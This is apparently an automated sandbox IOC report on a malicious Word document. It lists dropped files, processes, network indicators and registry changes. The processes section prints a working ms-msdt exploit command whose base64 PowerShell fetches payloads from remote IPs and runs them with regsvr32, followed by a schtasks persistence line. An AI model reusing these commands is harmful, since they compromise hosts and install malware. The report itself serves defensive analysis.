IOC Report
doc782.docx

loading gif

Files

File Path
Type
Category
Malicious
doc782.docx
Microsoft OOXML
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$doc782.docx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\65C14846-0162-44EF-84AC-78ACBBBAB237
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3C56A8FB-78D9-4F9A-8FD2-4C0EF74EE524}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{51D44AD9-2EC9-4592-AFD3-FEABD139B753}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].htm (copy)
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES51A8.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES6719.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RES7AFF.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 08:43:10 2022, mtime=Tue Jun 7 15:44:09 2022, atime=Tue Jun 7 15:43:52 2022, length=10144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Little-endian UTF-16 Unicode text, with CR line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{950185C1-D03B-43EE-9B9C-D0CDFF898355}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{74F2B178-00AE-424F-83E7-BA599E828254}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{93886B29-9649-4D5E-975D-770BA1081A48}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E4F5B659-EE23-4A39-84D5-F59507B69C67}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{81AEC75A-0A9E-4A32-B5F6-541A0FA08477}
data
dropped
C:\Users\user\AppData\Local\Temp\{ACD4BEAE-F768-48FA-AC51-627BB9420B93}
data
dropped
There are 37 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
malicious
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59
malicious
C:\Windows\System32\regsvr32.exe
regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
malicious
C:\Windows\SysWOW64\regsvr32.exe
-s "C:\Users\user\AppData\Local\Temp\t.A"
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.234.247.119/123.RES
185.234.247.119
malicious
http://185.234.247.119/1676044147.dat
185.234.247.119
malicious
http://185.2
unknown
malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
http://schemas.xmlsoap.org/soap/http
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
http://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://store.office.cn/addinstemplate
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
http://185.234.247.119:80/123.RES
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
http://schemas.xmlsoap.org/wsdl/mime/
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
http://www.borland.com/namespaces/TypesI
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
http://www.borland.com/namespaces/TypesU
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
http://schemas.xmlsoap.org/wsdl/soap/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
http://www.borland.com/namespaces/Types
unknown
http://www.borland.com/namespaces/Typeso
unknown
http://185.234.247.119/123.RESyX
unknown
There are 92 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.234.247.119
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
dm)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
em)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
,q)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
/~)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1FA69
1FA69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\27611
27611
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://185.234.247.119/
Expiration
